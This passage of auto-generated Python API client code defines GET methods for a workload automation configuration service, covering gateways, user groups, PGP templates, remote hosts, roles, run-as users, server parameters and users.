# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/virtualfolders', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[FolderPropertiesData]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_mft_gateways(self, **kwargs): # noqa: E501
"""Get MFT gateways # noqa: E501
Get MFT gateways # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_mft_gateways(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[GatewayData]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_mft_gateways_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_mft_gateways_with_http_info(**kwargs) # noqa: E501
return data
def get_mft_gateways_with_http_info(self, **kwargs): # noqa: E501
"""Get MFT gateways # noqa: E501
Get MFT gateways # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_mft_gateways_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[GatewayData]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_mft_gateways" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/gateways', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[GatewayData]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_mft_user_groups(self, **kwargs): # noqa: E501
"""Get all user groups that match the search criteria. # noqa: E501
Get all user groups that match the search criteria. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_mft_user_groups(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The user group name.
:param str external_users: external users.
:param str ldap_groups: ldap groups.
:return: list[UserGroupPropertiesData]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_mft_user_groups_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_mft_user_groups_with_http_info(**kwargs) # noqa: E501
return data
def get_mft_user_groups_with_http_info(self, **kwargs): # noqa: E501
"""Get all user groups that match the search criteria. # noqa: E501
Get all user groups that match the search criteria. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_mft_user_groups_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The user group name.
:param str external_users: external users.
:param str ldap_groups: ldap groups.
:return: list[UserGroupPropertiesData]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'external_users', 'ldap_groups'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_mft_user_groups" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'name' in params:
query_params.append(('name', params['name'])) # noqa: E501
if 'external_users' in params:
query_params.append(('externalUsers', params['external_users'])) # noqa: E501
if 'ldap_groups' in params:
query_params.append(('ldapGroups', params['ldap_groups'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/usergroups', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[UserGroupPropertiesData]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_pgp_templates(self, server, agent, **kwargs): # noqa: E501
"""Get PGP Templates # noqa: E501
Get PGP Templates # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_pgp_templates(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str name: The PGP Template Name
:return: list[PgpTemplateData]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_pgp_templates_with_http_info(server, agent, **kwargs) # noqa: E501
else:
(data) = self.get_pgp_templates_with_http_info(server, agent, **kwargs) # noqa: E501
return data
def get_pgp_templates_with_http_info(self, server, agent, **kwargs): # noqa: E501
"""Get PGP Templates # noqa: E501
Get PGP Templates # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_pgp_templates_with_http_info(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str name: The PGP Template Name
:return: list[PgpTemplateData]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'agent', 'name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_pgp_templates" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `get_pgp_templates`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `get_pgp_templates`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
query_params = []
if 'name' in params:
query_params.append(('name', params['name'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/mft/pgptemplates', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[PgpTemplateData]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_remote_host_properties(self, server, remotehost, **kwargs): # noqa: E501
"""get a remote host configuration from Server # noqa: E501
Get the remote host configuration properties from the Server # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_remote_host_properties(server, remotehost, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the remote host is connected to. (required)
:param str remotehost: The name of the remote host. (required)
:return: AddRemoteHostParams
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_remote_host_properties_with_http_info(server, remotehost, **kwargs) # noqa: E501
else:
(data) = self.get_remote_host_properties_with_http_info(server, remotehost, **kwargs) # noqa: E501
return data
def get_remote_host_properties_with_http_info(self, server, remotehost, **kwargs): # noqa: E501
"""get a remote host configuration from Server # noqa: E501
Get the remote host configuration properties from the Server # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_remote_host_properties_with_http_info(server, remotehost, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the remote host is connected to. (required)
:param str remotehost: The name of the remote host. (required)
:return: AddRemoteHostParams
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'remotehost'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_remote_host_properties" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `get_remote_host_properties`") # noqa: E501
# verify the required parameter 'remotehost' is set
if ('remotehost' not in params or
params['remotehost'] is None):
raise ValueError("Missing the required parameter `remotehost` when calling `get_remote_host_properties`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'remotehost' in params:
path_params['remotehost'] = params['remotehost'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/remotehost/{remotehost}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AddRemoteHostParams', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_remote_hosts(self, server, **kwargs): # noqa: E501
"""get Server remote hosts # noqa: E501
Get all the remote hosts of the specified Server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_remote_hosts(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server to query. (required)
:return: StringListResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_remote_hosts_with_http_info(server, **kwargs) # noqa: E501
else:
(data) = self.get_remote_hosts_with_http_info(server, **kwargs) # noqa: E501
return data
def get_remote_hosts_with_http_info(self, server, **kwargs): # noqa: E501
"""get Server remote hosts # noqa: E501
Get all the remote hosts of the specified Server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_remote_hosts_with_http_info(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server to query. (required)
:return: StringListResult
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_remote_hosts" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `get_remote_hosts`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/remotehosts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StringListResult', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_role(self, role, **kwargs): # noqa: E501
"""Get Authorization Role # noqa: E501
Get Authorization Role # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_role(role, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str role: The Role name. (required)
:return: RoleData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_role_with_http_info(role, **kwargs) # noqa: E501
else:
(data) = self.get_role_with_http_info(role, **kwargs) # noqa: E501
return data
def get_role_with_http_info(self, role, **kwargs): # noqa: E501
"""Get Authorization Role # noqa: E501
Get Authorization Role # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_role_with_http_info(role, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str role: The Role name. (required)
:return: RoleData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['role'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_role" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'role' is set
if ('role' not in params or
params['role'] is None):
raise ValueError("Missing the required parameter `role` when calling `get_role`") # noqa: E501
collection_formats = {}
path_params = {}
if 'role' in params:
path_params['role'] = params['role'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/authorization/role/{role}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RoleData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_role_associates(self, role, **kwargs): # noqa: E501
"""Get all authorization entities associated with role # noqa: E501
Get all authorization entities associated with role # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_role_associates(role, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str role: role name. (required)
:return: list[AssociateData]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_role_associates_with_http_info(role, **kwargs) # noqa: E501
else:
(data) = self.get_role_associates_with_http_info(role, **kwargs) # noqa: E501
return data
def get_role_associates_with_http_info(self, role, **kwargs): # noqa: E501
"""Get all authorization entities associated with role # noqa: E501
Get all authorization entities associated with role # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_role_associates_with_http_info(role, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str role: role name. (required)
:return: list[AssociateData]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['role'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_role_associates" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'role' is set
if ('role' not in params or
params['role'] is None):
raise ValueError("Missing the required parameter `role` when calling `get_role_associates`") # noqa: E501
collection_formats = {}
path_params = {}
if 'role' in params:
path_params['role'] = params['role'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/authorization/role/{role}/associates', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[AssociateData]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_run_as_user(self, server, agent, user, **kwargs): # noqa: E501
"""Get Run-as user # noqa: E501
Get Run-as user details from server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_run_as_user(server, agent, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server. (required)
:param str agent: The Agent (required)
:param str user: The user name (required)
:return: RunAsUserData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501
else:
(data) = self.get_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501
return data
def get_run_as_user_with_http_info(self, server, agent, user, **kwargs): # noqa: E501
"""Get Run-as user # noqa: E501
Get Run-as user details from server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_run_as_user_with_http_info(server, agent, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server. (required)
:param str agent: The Agent (required)
:param str user: The user name (required)
:return: RunAsUserData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'agent', 'user'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_run_as_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `get_run_as_user`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `get_run_as_user`") # noqa: E501
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `get_run_as_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
if 'user' in params:
path_params['user'] = params['user'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/runasuser/{agent}/{user}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RunAsUserData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_run_as_users_list(self, server, **kwargs): # noqa: E501
"""Get Run-as user list that match the requested search criteria. # noqa: E501
Get Run-as user list that match the requested search criteria from server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_run_as_users_list(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server. (required)
:param str user: The Run-as user.
:param str agent: The agent.
:return: RunAsUsersList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_run_as_users_list_with_http_info(server, **kwargs) # noqa: E501
else:
(data) = self.get_run_as_users_list_with_http_info(server, **kwargs) # noqa: E501
return data
def get_run_as_users_list_with_http_info(self, server, **kwargs): # noqa: E501
"""Get Run-as user list that match the requested search criteria. # noqa: E501
Get Run-as user list that match the requested search criteria from server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_run_as_users_list_with_http_info(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server. (required)
:param str user: The Run-as user.
:param str agent: The agent.
:return: RunAsUsersList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'user', 'agent'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_run_as_users_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `get_run_as_users_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
query_params = []
if 'user' in params:
query_params.append(('user', params['user'])) # noqa: E501
if 'agent' in params:
query_params.append(('agent', params['agent'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/runasusers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RunAsUsersList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_server_parameters(self, server, **kwargs): # noqa: E501
"""get Server parameters # noqa: E501
Get all the parameters of the specified Server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_server_parameters(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server to query. (required)
:return: KeyValueListResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_server_parameters_with_http_info(server, **kwargs) # noqa: E501
else:
(data) = self.get_server_parameters_with_http_info(server, **kwargs) # noqa: E501
return data
def get_server_parameters_with_http_info(self, server, **kwargs): # noqa: E501
"""get Server parameters # noqa: E501
Get all the parameters of the specified Server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_server_parameters_with_http_info(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server to query. (required)
:return: KeyValueListResult
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_server_parameters" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `get_server_parameters`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/params', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='KeyValueListResult', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_servers(self, **kwargs): # noqa: E501
"""get all the Servers name and hostname in the system # noqa: E501
Get the names and hostnames of all Servers in the system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_servers(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: CtmDetailsList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_servers_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_servers_with_http_info(**kwargs) # noqa: E501
return data
def get_servers_with_http_info(self, **kwargs): # noqa: E501
"""get all the Servers name and hostname in the system # noqa: E501
Get the names and hostnames of all Servers in the system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_servers_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: CtmDetailsList
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_servers" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/servers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CtmDetailsList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user(self, user, **kwargs): # noqa: E501
"""Get user # noqa: E501
Get user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user(user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user: The user name. (required)
:return: UserData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_user_with_http_info(user, **kwargs) # noqa: E501
else:
(data) = self.get_user_with_http_info(user, **kwargs) # noqa: E501
return data
def get_user_with_http_info(self, user, **kwargs): # noqa: E501
"""Get user # noqa: E501
Get user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_with_http_info(user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user: The user name. (required)
:return: UserData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `get_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user' in params:
path_params['user'] = params['user'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/authorization/user/{user}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_user_effective_rights(self, **kwargs): # noqa: E501
"""Get user real effective authorizations # noqa: E501
Get user real effective authorizations by all his roles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_effective_rights(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: RoleData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_user_effective_rights_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_user_effective_rights_with_http_info(**kwargs) # noqa: E501
return data
def get_user_effective_rights_with_http_info(self, **kwargs): # noqa: E501
"""Get user real effective authorizations # noqa: E501
Get user real effective authorizations by all his roles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_user_effective_rights_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: RoleData
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_user_effective_rights" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
